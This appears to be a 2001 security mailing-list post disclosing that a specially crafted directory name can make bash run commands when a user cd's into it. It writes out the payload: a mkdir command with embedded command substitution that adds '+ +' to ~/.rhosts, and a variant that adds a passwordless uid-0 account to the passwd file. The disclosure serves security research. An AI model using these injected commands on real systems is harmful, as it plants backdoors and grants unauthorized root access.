Figured while everyone was working with bash, I might as well make this one public(I apologize if this is old news, apparently it hasnt been fixed if so). If a user creates a directory with a command like mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " and someone cd's into said directory, either by accident, or whatever, then it will cause it to actually execute. I also did this with a passwd file, echo a user such as r00t::0:0:\57root\57bin\57bash instead of + + to the rhosts. Played with symlinks and a few other ways to see if perhaps maybe the system could trip it if a user made the directory in say /tmp. Granted it may be a long shot on the users part, the ability to do so is a bad thing IMHO. This didnt seem to work on any of my BSD boxes. shadow - CLE ------------------------------------------------------------------------- Most Failure is due to giving up, not realizing how close to success you were - Thomas Edison -------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:43:24 PDT